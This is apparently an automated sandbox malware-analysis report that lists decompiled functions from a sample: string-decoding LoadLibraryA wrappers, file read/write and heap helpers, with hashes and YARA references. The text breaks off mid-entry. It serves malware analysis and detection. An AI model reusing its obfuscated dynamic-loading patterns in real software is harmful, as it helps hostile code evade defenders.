            • API String ID: 1029625771-0
            • Opcode ID: 39c8e5ac199bad6199c67db8c2ed9978854c9a9a2a7793027f7f806457f2415c
            • Instruction ID: 0a37131ee298549435cd53125c4ad43ed8ebc60d89de4e2f1cc596e9dac7f3cc
            • Opcode Fuzzy Hash: 39c8e5ac199bad6199c67db8c2ed9978854c9a9a2a7793027f7f806457f2415c
            • Instruction Fuzzy Hash: 7BD02B61D8434C35D610F2E85C03FDD735C8784700F8001D6BE08D60C2E9A1921483F3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B726D, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B726D() {
				char _v8;
				char _v20;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x102, 8, 0xc,  &_v20);
				_v8 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v20); // executed
				return _t8;
			}






            0x009b7285
            0x009b728d
            0x009b729a
            0x009b72a0
            0x009b72a5

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B72A0
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 7a2548e2b12aaa8c17b7cba770a80ae7aafcf244e24c550e050761b9d7cfce96
            • Instruction ID: 25d59aa53f22cf5481cc73268a0ade3b28c1d7611e5bfcafcf879f00392904be
            • Opcode Fuzzy Hash: 7a2548e2b12aaa8c17b7cba770a80ae7aafcf244e24c550e050761b9d7cfce96
            • Instruction Fuzzy Hash: 73D0126198434875E710F2E84D03FBE775C9785714F850599BE58961C2E9A1961443A2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B738A, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B738A() {
				char _v7;
				char _v16;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x14c, 0xe, 9,  &_v16);
				_v7 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






            0x009b73a2
            0x009b73aa
            0x009b73b7
            0x009b73bd
            0x009b73c2

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B73BD
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 2781e5dee87ce8d22ef109c808603513ecacc800862ca17c82e8181d5786c81f
            • Instruction ID: 0c57ee9720e9b7167c5543ebc7c271f700f335d75d9cfbf922d6b6c1c9bcb060
            • Opcode Fuzzy Hash: 2781e5dee87ce8d22ef109c808603513ecacc800862ca17c82e8181d5786c81f
            • Instruction Fuzzy Hash: 57D05B65D4438C79E610F2E49D03FDD775C8785714F8101D5BE18E61C2E9A1D61483E3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6FA7, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B6FA7() {
				char _v8;
				char _v20;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x291, 9, 0xc,  &_v20);
				_v8 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v20); // executed
				return _t8;
			}






            0x009b6fbf
            0x009b6fc7
            0x009b6fd4
            0x009b6fda
            0x009b6fdf

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6FDA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 01a037ba32745197a6ed4473188666aeb59a16dbaf4d2fc16b176e1af9838576
            • Instruction ID: 5d24f23509d37380353a7e508f7b141fa595c31745fe69ae02e6e2fa4700c9c2
            • Opcode Fuzzy Hash: 01a037ba32745197a6ed4473188666aeb59a16dbaf4d2fc16b176e1af9838576
            • Instruction Fuzzy Hash: C5D02B5194034C79E710F2E84C03FBE735C8784700F810189BE18A70C3E9A1861043F3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6F2A, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B6F2A() {
				char _v7;
				char _v16;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x7fa, 0xa, 9,  &_v16);
				_v7 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






            0x009b6f42
            0x009b6f4a
            0x009b6f57
            0x009b6f5d
            0x009b6f62

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6F5D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 281f2294b740ebd8828daf713238b968fdd330675ef53e9f885f5b41d068dc29
            • Instruction ID: ad8a0373c84152a1c7d8753c579fe5aa2371671eec4678f73948925c8c134343
            • Opcode Fuzzy Hash: 281f2294b740ebd8828daf713238b968fdd330675ef53e9f885f5b41d068dc29
            • Instruction Fuzzy Hash: A9D02B91D8434C39D610F2E45C43FAC735C8785700F8101D5BE0CD60C2EDA1921483E3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7351, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B7351() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x269, 9, 0xb,  &_v16);
				_v5 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






            0x009b7369
            0x009b7371
            0x009b737e
            0x009b7384
            0x009b7389

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B7384
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 11e988d3285495ab9a18706a2feaecb19a53f22b06be3ebfbb250548fabff087
            • Instruction ID: 4ddc051b9e3a3a5585c9450ff891cb7d5c4c1163ed2cfbcd5d13d9607b9e7100
            • Opcode Fuzzy Hash: 11e988d3285495ab9a18706a2feaecb19a53f22b06be3ebfbb250548fabff087
            • Instruction Fuzzy Hash: 8ED05B65D8434C79D611F2E49C03F9D735C8785714F8101D5BE18D61C2EDA2961583E3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B740B, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B740B(intOrPtr _a4, void* _a8, long _a12) {
				void* _t8;
				intOrPtr _t12;

				_t12 = _a4;
				_t8 = CreateIoCompletionPort(_a8,  *(_t12 + 4), _a12, 0); // executed
				return 0 |  *(_t12 + 4) == _t8;
			}





            0x009b740f
            0x009b741d
            0x009b742f

            APIs
            • CreateIoCompletionPort.KERNELBASE(?,?,009B38D6,00000000,00000000,?,009B38D6,?,?,00000000), ref: 009B741D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CompletionCreatePort
            • String ID:
            • API String ID: 499945625-0
            • Opcode ID: 423de82462f1e38ec1dd7140e9d5f5d76cbaad56ce58fed57ec28620351636d9
            • Instruction ID: 8930bd6fa3013fbf831a09964d14b5e28d106ea97de60903ec59c6db574c942c
            • Opcode Fuzzy Hash: 423de82462f1e38ec1dd7140e9d5f5d76cbaad56ce58fed57ec28620351636d9
            • Instruction Fuzzy Hash: 2FD0A733104318BFCF004F94EC01AC67BA8FF08B50F008029F51A86050D332F810DB84
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7895, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B7895(WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t6;

				_t6 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
				_t7 =  ==  ? 0 : _t6;
				return  ==  ? 0 : _t6;
			}




            0x009b78ab
            0x009b78b6
            0x009b78ba

            APIs
            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,009B415C,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009B78AB
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 021528bef9d09d0f9a10f741f9bbe1aa3398a99c5a868a5b9071f6613b756f7f
            • Instruction ID: c303d6742f92ed4ba727204460774ad1e5b215ede620eb53932fb9822df55332
            • Opcode Fuzzy Hash: 021528bef9d09d0f9a10f741f9bbe1aa3398a99c5a868a5b9071f6613b756f7f
            • Instruction Fuzzy Hash: B1D0923214428DBFDF165FA1DC02F9A3F66AF09760F504618FA29980E0D672E470AB98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B48EE, Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B48EE(void* _a4, long _a8) {
				void* _t4;

				if(_a8 != 0) {
					_t4 = RtlAllocateHeap(_a4, 8, _a8); // executed
					return _t4;
				} else {
					return 0;
				}
			}




            0x009b48f5
            0x009b4903
            0x009b490a
            0x009b48f7
            0x009b48fa
            0x009b48fa

            APIs
            • RtlAllocateHeap.NTDLL(009B1C68,00000008,00000000), ref: 009B4903
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f71e7e996f2d891c394e2bba39de510daab75f2891f98c0ff9a4bdbb3fbcd310
            • Instruction ID: 375c3385845fa6c7a51e49b866c074ade8e9862be6df7087e56822c7b3707752
            • Opcode Fuzzy Hash: f71e7e996f2d891c394e2bba39de510daab75f2891f98c0ff9a4bdbb3fbcd310
            • Instruction Fuzzy Hash: BAC0123148860CAEDF004E94EC05BA83BA9AB10326F00C420FA1C48462C77695A0AB40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5327, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
            Download Yara Rule
            APIs
            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,009B1A5D,00000000,00000000,?,00000000,?), ref: 009B5331
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: InfoNativeSystem
            • String ID:
            • API String ID: 1721193555-0
            • Opcode ID: 60b798d03bfe27f1d9fda26ed41fd9ede644840ae1d42c9dd28d6bff5be1174a
            • Instruction ID: ee8ee8d571e4e55bac32f020661a6675d977fe3529d25a6bc5ea7dc98d77cbc9
            • Opcode Fuzzy Hash: 60b798d03bfe27f1d9fda26ed41fd9ede644840ae1d42c9dd28d6bff5be1174a
            • Instruction Fuzzy Hash: 95C08026C1820C4BCF00FBF0994D4CD77FC970C204B400590D80593040F665DE54C3D5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B761C, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B761C(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
				int _t6;

				_t6 = ReadFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
				return _t6;
			}




            0x009b762e
            0x009b7635

            APIs
            • ReadFile.KERNELBASE(?,?,009B3660,00000000,?,?,009B3264,?,?), ref: 009B762E
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 5eed074746c409618be82c9ffdb72cebfbeccb21d480b614c0a046bd8eb890ef
            • Instruction ID: fdcb0f8a5015af51a108c2bbef417d6533b52d1d4077a2d8d5d581988b3c7873
            • Opcode Fuzzy Hash: 5eed074746c409618be82c9ffdb72cebfbeccb21d480b614c0a046bd8eb890ef
            • Instruction Fuzzy Hash: 48C00236154248BFDF055F84EC05EEA3B69EB08A15F104050BA184A561C672E960AB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7650, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B7650(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
				int _t6;

				_t6 = WriteFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
				return _t6;
			}




            0x009b7662
            0x009b7669

            APIs
            • WriteFile.KERNELBASE(?,?,009B3655,00000000,?,?,009B36F5,?,?,?,?,?), ref: 009B7662
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: ea81c41a3a4caaa9a457eb4a81914dc5dd28a3fc35c0bd3ee83b9458a421ce83
            • Instruction ID: 4fc0d5c0c169f7c453daa3cf1b7997ac5bd54780064d9595c037842f546bd9ec
            • Opcode Fuzzy Hash: ea81c41a3a4caaa9a457eb4a81914dc5dd28a3fc35c0bd3ee83b9458a421ce83
            • Instruction Fuzzy Hash: EDC00236154208BFDF015F84EC45EAA3BA9FB08651F044050BA184A161C672E920AB55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B490B, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B490B(void _a4) {
				void* _t5;

				_t4 =  !=  ? _a4 : 0x100000;
				_t5 = HeapCreate(0,  !=  ? _a4 : 0x100000, 0); // executed
				return _t5;
			}




            0x009b4919
            0x009b4920
            0x009b4927

            APIs
            • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,009B74EB,?,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4920
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: d609331c4f2159b52552621a2795074dce65db6d7c46043ecd2c931390b106ac
            • Instruction ID: 32502438e5b2a5a9ad07577d40efa08f3b93cfefe30750c83ac77f1fb7faa263
            • Opcode Fuzzy Hash: d609331c4f2159b52552621a2795074dce65db6d7c46043ecd2c931390b106ac
            • Instruction Fuzzy Hash: DCC08C31248208EBEB408A80DC05FA537DCDB04782F004010FA0C890D0C3B0A8908A94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B78BB, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B78BB(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				int _t5;

				_t5 = ReadFile(_a4, _a8, _a12, _a16, 0); // executed
				return _t5;
			}




            0x009b78cc
            0x009b78d3

            APIs
            • ReadFile.KERNELBASE(000000FF,FFFFFF18,00000000,?,00000000,?,009B2F68,00000000,?,000000E8,?,00000000,FFFFFF18,000000FF,00000002), ref: 009B78CC
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: e60b4dd853449f4a8813fbb2493d6276949935d9dc158e5f42dd7975a96cca29
            • Instruction ID: 5783b08eb0c1d9c1206bfd87eea9a4f526df2d9065f718d78586036e714c7c70
            • Opcode Fuzzy Hash: e60b4dd853449f4a8813fbb2493d6276949935d9dc158e5f42dd7975a96cca29
            • Instruction Fuzzy Hash: B3C0013204424DBBCF025F81EC05EDA3F2AEB09A65F108050FA18184618772A971AB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B78D4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E009B78D4(void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				int _t5;

				_push(_a16);
				_t5 = SetFilePointerEx(_a4, _a8, _a12, 0); // executed
				return _t5;
			}




            0x009b78d7
            0x009b78e5
            0x009b78ec

            APIs
            • SetFilePointerEx.KERNELBASE(000000FF,FFFFFF18,00000000,00000000,009B2F52,?,009B2F52,00000000,FFFFFF18,000000FF,00000002), ref: 009B78E5
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: aa34cd8125faee6b8a4b0c9c8d4b2f2f6cd1dc1beb51690b4672421f4a7ec0bc
            • Instruction ID: 199834fa9ed352024b9694a86032a778e77cae601a6ded5622f8decdf2a076a9
            • Opcode Fuzzy Hash: aa34cd8125faee6b8a4b0c9c8d4b2f2f6cd1dc1beb51690b4672421f4a7ec0bc
            • Instruction Fuzzy Hash: 2FC0013204820DBBDF025F91EC05E9A3F2AEB09661F448010FA28181618773A970AB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B78ED, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B78ED(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				int _t5;

				_t5 = WriteFile(_a4, _a8, _a12, _a16, 0); // executed
				return _t5;
			}




            0x009b78fe
            0x009b7905

            APIs
            • WriteFile.KERNELBASE(00000DA5,00000000,009B4187,?,00000000,?,009B4187,00000000,00000DA5,?), ref: 009B78FE
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: ba8d6b0c1236751e67850ac11c9d7e42af4fb4e9a7e67bb2c53c520d9e04513c
            • Instruction ID: 53d1f26fb5431b41ecf1622c147bb66e33c1ac0cf12cf6ad4a3e975370308c7c
            • Opcode Fuzzy Hash: ba8d6b0c1236751e67850ac11c9d7e42af4fb4e9a7e67bb2c53c520d9e04513c
            • Instruction Fuzzy Hash: 04C0013604820DBBCF025F81EC05E9A3F6AFB096A0F088010FA18180618773A930AB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4936, Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4936(void* _a4, void* _a8) {
				signed char _t3;

				_t3 = RtlFreeHeap(_a4, 0, _a8); // executed
				return _t3 & 0x000000ff;
			}




            0x009b4941
            0x009b494b

            APIs
            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009B4941
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 5e99e60262688a205e73207831166d9b5a302b9519a377051483c0a6f689b984
            • Instruction ID: 3ee9b8089dcbb175d9cfaf4e29e794afea1b87c30322208a7151388e306f6aa1
            • Opcode Fuzzy Hash: 5e99e60262688a205e73207831166d9b5a302b9519a377051483c0a6f689b984
            • Instruction Fuzzy Hash: 63C09B3114421C7BCF011FC1DC05F543F59AB016D1F404051FA0C44061C676D5606754
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4BEE, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4BEE(void* _a4) {
				void* _t3;
				int _t4;

				if(_a4 != 0) {
					_t4 = FindCloseChangeNotification(_a4); // executed
					return _t4;
				}
				return _t3;
			}





            0x009b4bf5
            0x009b4bfa
            0x00000000
            0x009b4bfa
            0x009b4c01

            APIs
